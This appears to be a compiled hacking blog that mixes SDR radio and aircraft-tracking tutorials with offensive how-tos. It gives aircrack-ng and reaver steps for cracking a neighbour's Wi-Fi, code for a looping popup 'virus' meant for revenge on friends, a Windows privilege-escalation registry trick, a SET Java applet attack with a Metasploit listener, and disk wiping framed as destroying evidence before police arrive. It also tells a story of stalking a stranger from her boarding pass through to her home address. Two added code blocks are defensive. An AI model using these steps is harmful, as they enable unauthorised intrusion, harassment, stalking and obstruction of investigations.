Listening to WFM radio......

For the most part, an SDR is similar to a radio receiver which can be used to listen to transmissions on any frequency. In simple words, it is like the radio receivers present in police cars, boats and small airplanes.

Requirements:-
  1. SDR dongle (antenna + front end)
  2. SDR# (decoder and interface)
If you are using SDR for the first time, we advise you to follow the easy installation guide on rtl-sdr.org, which helps you install all the required drivers correctly.

How to?
  1. After extracting the files, run the install.bat file.
  2. After the files are downloaded, open the sdrsharp folder and run the sdrsharp application program.
  3. Now hit the configure button and then hit close.


  4. Then select WFM and hit the play button. If it doesn't work, adjust the RF gain.
  5. Now change the frequency to your desired frequency by clicking on the frequency (in the example the frequency is 98.3 MHz).


Note:-
I would not advise you to listen on frequencies used by the police department and other services.

Tracking Airplanes with sdr....

ADS-B is the short form of Automatic Dependent Surveillance–Broadcast, a kind of packet sent out by every plane in the sky; this packet helps the ground station to locate an aircraft in the air. All aircraft transponders transmit data at the frequency 1090 MHz. To receive these transmissions one needs a receiver for this frequency: an ADS-B receiver. The main flaw in this system is that there is no encryption of packets, which means anyone with the right setup can track planes.
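To make the "no encryption" point concrete, here is an added example (not from the original post or from the adsbsharp project) that parses one raw 112-bit frame and shows that the aircraft address and callsign sit in clear text, protected only by a CRC-24 that detects transmission errors and authenticates nothing. It assumes the decoder emits raw frames as `*<hex>;` lines; the sample frame is one commonly used in public ADS-B decoding documentation.

```python
GENERATOR = 0x1FFF409  # Mode S CRC-24 generator polynomial (25 bits)
# 6-bit character set used by aircraft identification messages
CHARSET = "#ABCDEFGHIJKLMNOPQRSTUVWXYZ#####_###############0123456789######"

def crc_remainder(frame: bytes) -> int:
    """Divide the whole frame by the generator; 0 means the parity matches."""
    value = int.from_bytes(frame, "big")
    for bit in range(len(frame) * 8 - 1, 23, -1):
        if (value >> bit) & 1:
            value ^= GENERATOR << (bit - 24)
    return value & 0xFFFFFF

def parse_raw_line(line: str) -> dict:
    """Parse one '*<28 hex digits>;' line (assumed raw output format)."""
    text = line.strip()
    if not (text.startswith("*") and text.endswith(";")):
        raise ValueError("not a raw frame line")
    frame = bytes.fromhex(text[1:-1])
    if len(frame) != 14:
        raise ValueError("not a 112-bit frame")
    info = {
        "df": frame[0] >> 3,               # downlink format, 17 = ADS-B
        "icao": frame[1:4].hex().upper(),  # 24-bit aircraft address, in clear
        "type_code": frame[4] >> 3,
        "crc_ok": crc_remainder(frame) == 0,
        "callsign": None,
    }
    if info["df"] == 17 and 1 <= info["type_code"] <= 4:
        bits = int.from_bytes(frame[5:11], "big")  # 8 characters x 6 bits
        chars = [CHARSET[(bits >> s) & 0x3F] for s in range(42, -1, -6)]
        info["callsign"] = "".join(chars).rstrip("_#")
    return info

# Publicly documented sample frame, plus a copy with one bit flipped to show
# that the CRC only catches transmission errors.
GOOD = parse_raw_line("*8D406B902015A678D4D220AA4BDA;")
BAD = parse_raw_line("*8D406B902015A678D4D220AA4BDB;")

if __name__ == "__main__":
    print(GOOD)
    print(BAD["crc_ok"])
```

Because the parity is a plain CRC with a public polynomial, a receiver can tell a corrupted frame from a clean one but cannot tell who sent it.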


Requirements:-
  1. SDR dongle (antenna + front end)
  2. adsbsharp (decoder)
  3. adsbscope (interface software)



setup

If you are using SDR for the first time, we advise you to follow the easy installation guide on rtl-sdr.org, which helps you install all the required drivers correctly.

How to?

  1. First, from the sdrsharp package, run the adsb# application (just hit start; don't change anything).
  2. Now keep adsb# running and open the adsbscope application. Click on other and then click on Network setup.
  3. Now configure your decoder by selecting adsb# and your machine by clicking on local host.
  4. Hit close and exit, then go to network and select raw data client.
  5. After a few minutes you will see a few planes on the map, and their details will be displayed on the right panel.



Note:-
The dongle used in the demonstration is only a receiver and cannot send anything, so you don't need any special permission for using it.
  

Sniffing with Wireshark!!!

Wireshark is a network protocol analyzer which helps you to sniff, store and analyze network traffic. It is built on top of tshark but displays everything in a more systematic way. It is available for almost all operating systems. The software consists of various filters which are used to select the specific packets you want to analyze.

Whenever you start Wireshark you will have to select an interface from the list of interfaces. This decides what traffic you will be able to capture. To capture all the traffic in the air with your wireless chip, you can select the card with monitor mode enabled. To capture all the traffic on a specific frequency you can also select your rtl-sdr.

(Screenshot: tshark -i mon0, using the mon0 interface.)

The best thing about Wireshark is that it can be integrated with different types of hardware and software. There are millions of Wireshark filters, so you cannot memorize all of them, but you can always refer to them whenever you want on https://www.wireshark.org/.


The only way to learn Wireshark is by experimenting. To get a copy you can download it from the following link.

Automated wireless hacking: wifi hacking the easy way!!!!!

Wifite is a Python script which automates the whole process of wireless hacking. The script attempts all the wireless exploits one by one till it gets the key of the wireless network. The best tool for lazy hackers. :p



Requirements:-

  • A wireless card with monitoring mode.
  • Wifite.py file (It is already installed in Kali Linux).


We will use Kali Linux for our demonstration.

How to?

  1. Open a new terminal and type wifite (in the case of Kali; for other distributions you might have to type ./python wifite.py).
  2. Select your interface name; in our case we only had one interface so we can skip this step.
  3. Now select the network which you want to hack; we only have one network so we will give 1.
  4. Now wait till the script cracks the WEP or WPA key to give you a WEP key for the network.


Note:-

If you want to set the parameters at the beginning you can do that as well, which means the script will use these parameters from the start. To check the available parameters you can type wifite -h.
If the script is unable to crack the hash, you can also crack it with other hash cracking tools like hashcat and aircrack-ng.


Coding popup virus....

Viruses have been an important part of hacking for a long time. These malicious programs can help you perform specific commands on any victim computer. They are very helpful when you want to take revenge on a friend. So we decided to teach you how to code popup viruses which are non-lethal to the victim's computer.

How to?

  1. The first step to code a nice virus is deciding what you want to display on your friend's computer. The commonly used phrases are "you are a dick", "pay for your sins" and "f@## you!". The first thing to remember is that these messages should be of the string data type.
  2. The second part of creating a popup virus is the infinite loop, that is, a loop that has no end point. For example, if you are coding a Java virus your popup command should be inside while(true) {  }.
  3. The last step is to save the file with a suitable extension. For example, if you are creating a bat file then you should save the program as filename.bat, or if you are coding a Java virus then you will need to save the files in the form of an executable jar file.
Sample codes:-

Java code:-
 private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {           
        while(true)
        {
        JOptionPane.showMessageDialog(this,"fuck you","pay for your sins",3);
        }

    } 

Batch code:-
:top
@echo off
msg * (you fucked my life)
cls
msg * (now my turn)

cls
GOTO top

Note:-
For developing Java viruses we advise you to use NetBeans, as it makes the process of coding a lot easier. And as far as .bat scripting is concerned, Notepad is the best tool you can use.

In batch viruses you can use code like 
start iexplore.exe "www.google.com"

START %SystemRoot%\system32\notepad.exe
to open Notepad and Internet Explorer.

You can also use the code by a Google researcher to get admin access on Windows:
reg add HKCU\Environment /v TEMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp

reg add HKCU\Environment /v TMP /f /t REG_EXPAND_SZ /d %%USERPROFILE%%\..\..\..\..\..\windows\faketemp

Stalking advanced: Personal information gathering the fun way.

Disclaimer:-
This post is not based on any real life incident. The characters in this post are imaginary. Resemblance might be a coincidence. Through this post we don't intend to disrespect women or men in any way. This post is for mere entertainment and understanding of personal information gathering.  


At an airport, I saw a girl; she was beautiful. I was standing behind her in the line to get the boarding cards. When she got her boarding card I was able to get a glance at it. I saw some major details about her.
After getting my boarding card, I sat down at the lounge. I switched on my laptop. I was eager to know about her so I started searching. First I wanted to know where she was going, so I searched her flight number on http://planefinder.net/; it was Goa.
This is just a random search
Then I was curious about her social life, so I searched on https://pipl.com/ for all the profiles with her name. I got her Facebook profile, where I saw her About section and found out her dad's name under family. So to find out how hard my ass would be kicked if I asked for her, I searched her dad's name on linkedin.com; this was a little horrifying.
Then I went through her Facebook profile to find out her address. And luckily she had added a location of her house in a post which she had made public so I searched the coordinates in Google which gave me her address.

Then I opened https://emkei.cz/ to send her a fake mail but something stopped me. I found out that she was taken, as I saw her boyfriend, who came late and was on another flight. I switched off my laptop and went towards gate 5 to board the aircraft, thinking that people should have some representation that can differentiate single and taken.


How I met your neighbor!!!!

There are 2 ways to hack a wireless network; both of them require mon0 (monitoring mode) if you are not associated and authenticated to the network (connected).

Things that you might need:-

  1. Kali Linux on VMware.
  2. Dlink dw-123 (or any other wireless card that supports monitoring mode).

Dictionary attack:-
A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary.


How to?

  1. Open a new terminal in Kali Linux, type airmon-ng start wlan0 and hit enter; here wlan0 can be replaced by the interface name of your card.
  2. Now type airodump-ng mon0 and hit enter to get the list of networks in your range.
  3. Now type airodump-ng --bssid target’s bssid -c channel number --write filename mon0 and hit enter to capture the packets of the target router.
  4. Now in a new terminal window type aireplay-ng -0 5 --ignore-negative-one -a essid -c client essid mon0 to kick the user out and make him authenticate himself once again, which gives us an authentication frame.
  5. Now press Ctrl+C to stop the first terminal or close both terminals.
  6. Now type aircrack-ng -w “path to wordlist” filename.cap and hit enter to crack the hash.

Limitations:-

If you don't have the word in the word-list then you cannot hack the password.
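From the network owner's side, the forced re-authentication in step 4 is visible on the air as a short burst of deauthentication frames aimed at one client. The following added example (not part of the original post) parses 802.11 management frame headers and flags such bursts; it assumes frames are supplied as raw bytes without a radiotap header, and the MAC addresses, timestamps and the `build_frame` helper are constructed for illustration.

```python
import struct
from collections import defaultdict

DEAUTH_FC0 = 0xC0  # frame control byte 0: management frame, subtype 12

def parse_deauth(frame: bytes):
    """Return (dst, src, bssid, reason) for a deauthentication frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC0:
        return None
    dst, src, bssid = (frame[i:i + 6].hex(":") for i in (4, 10, 16))
    (reason,) = struct.unpack_from("<H", frame, 24)  # follows the 24-byte header
    return dst, src, bssid, reason

def deauth_bursts(capture, threshold=5, window=2.0):
    """capture: (timestamp_seconds, frame_bytes) pairs in time order.
    Returns {(bssid, station): peak deauth count inside `window` seconds}
    for every pair whose peak reaches `threshold`."""
    seen = defaultdict(list)
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed:
            dst, src, bssid, _ = parsed
            station = dst if src == bssid else src
            seen[(bssid, station)].append(ts)
    alerts = {}
    for key, stamps in seen.items():
        start = peak = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts

def build_frame(fc0, dst, src, bssid, reason=7):
    """Build a constructed 802.11 management frame (no radiotap header)."""
    addrs = b"".join(bytes.fromhex(a) for a in (dst, src, bssid))
    return bytes([fc0, 0, 0, 0]) + addrs + b"\x00\x00" + struct.pack("<H", reason)

# Constructed sample: five deauths to one station in 0.4 s, one isolated
# deauth to another station, and one beacon (0x80) that must be ignored.
AP, STA = "020000000001", "020000000002"
SAMPLE = [(10.0 + 0.1 * i, build_frame(0xC0, STA, AP, AP)) for i in range(5)]
SAMPLE += [(30.0, build_frame(0xC0, "020000000003", AP, AP, 3)),
           (31.0, build_frame(0x80, "ffffffffffff", AP, AP))]

if __name__ == "__main__":
    print(deauth_bursts(SAMPLE))
```

Enabling 802.11w protected management frames on the access point makes clients ignore unauthenticated deauthentication frames, which removes the need to rely on detection alone.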

Brute force attack:-
Brute Force Attack aims at being the simplest kind of method to gain access to a site: it tries usernames and passwords, over and over again, until it gets in.

How to?
  1. Open a new terminal in Kali Linux, type airmon-ng start wlan0 and hit enter; here wlan0 can be replaced by the interface name of your card.
  2. Now type airodump-ng mon0 to get the list of networks in your range.
  3. Now to deploy reaver you will need to type reaver -i mon0 -b bssid -vv and hit enter; after a few minutes or hours you will get the WPS key and WPA key of the router.

Limitation:-
It takes a lot of time to crack the password and requires stable traffic on the network.



Monitoring mode(mon0)

Introduction:-
Wireless cards have 6 different modes, each with its own functionality:-
  1. Managed (Client) 
  2. Master (router)
  3. Ad-hoc (peer to peer)
  4. Mesh (planned ad-hoc)
  5. Repeater (WI-FI extender)
  6. Monitor 
Monitor mode is a special mode available in some wireless cards that allows you to sniff packets which are being sent from the router to the client even when you are not associated and authenticated to the network. You can also use it to authenticate the user who is associated and authenticated to the network. In other words, it is like spying on all the networks in your range.
  
How to check your card? 
Open a terminal, type iw phy phy0 info | grep -A8 modes and hit enter. Here phy0 can be replaced with phy1, phy2, phy3, etc. depending on your system. To find this out, type airmon-ng in the terminal and hit enter.

How to switch it on?
To enable monitor mode, type ifconfig in your terminal and hit enter. It will give you a list of your interfaces; note down the wireless interface name (in our case it was wlan0). Now type airmon-ng start wlan0 and hit enter to start monitor mode on your wireless card.

Is it working?
To check whether the mon0 interface is working, type tshark -i mon0 and hit enter.

What is its use?
This mode is required for all sorts of Wi-Fi hacking and sniffing.

Note:-
In our tests and hacks we are using a Dlink dw-123 Wi-Fi dongle.

When cops are at your door step!

When it comes to a cyber crime, evidence can decide whether you will end up in jail or walk out of the case with ease. From our past experience we have learned that you can't undo what you have done just by deleting the files, as there are methods and tools to retrieve deleted data. Thus we decided to find a way to delete everything which could help the investigators prove you are guilty. DBAN (Darik's Boot and Nuke) is a Linux distribution which is designed to erase all the memory and traces of it from the drive. It is a self-contained boot image that securely wipes the hard disks of most computers. DBAN is appropriate for bulk or emergency data destruction.

How to?

  1. Download the ISO file and create a bootable CD or drive.
  2. Once you are done, plug the drive or the CD into your PC and restart it.
  3. Once DBAN boots up, type autonuke or quick and hit enter.
  4. Your disks will be wiped clean.

Note:-

Autonuke will delete the ISO burned on the disk as well if you are using a pen-drive. You can hit F3 to get the list of all the commands.


Java applet attack with SET

All browsers run Java applets, which can be used to gain access to the system. The beauty of such attacks is that the exploit code never touches the disk, so such an attack can't be detected by the antivirus. Except for Mac, all operating systems are vulnerable to such attacks.

How to?

  1. Open the terminal, type service postgresql start and hit enter, then type service metasploit start and hit enter.
  2. After you are connected, type setoolkit and hit enter.
  3. Now select option 1 and hit enter.
  4. Now select option 2, which is website attack vectors, and hit enter.
  5. Now select option 1, which is the Java applet one, and hit enter.
  6. Now hit 2, which is site cloner, and hit enter. Then enter your IP address (remember, the Ethernet one).
  7. Now select your payload and backdoor according to your target.
  8. Now in another terminal type msfconsole and hit enter, then type use exploit/multi/handler and hit enter. Set the payload with the set payload command, set the port and IP with the set command, and start the multi listener.



Note:- 
When the user goes to the link he/she will be prompted with a message shown below till he or she clicks install.


Port Scan: The easy way

Port scanning is a technique to scan a system for open ports which can be used for exploitation. This can be considered the first step of hacking. The process can sometimes be more technical, but we would like you to learn the easy way to do it.

How to?
Android:-
  1. In Fing, you can scan the ports just by selecting the host machine and then Service Scan.
  2. In Landroid, you can select port scan, enter the IP of the target and then select Go.
  3. In Dsploit, you can select the host and then select port scanner.


Kali Linux:-
  1. Open the terminal, type zenmap (GUI for nmap) and hit enter.
  2. Now type the target's IP in the target box, select the scan type and hit scan.

Note:- If the system detects the scan, or port discovery is off, you will not get any results.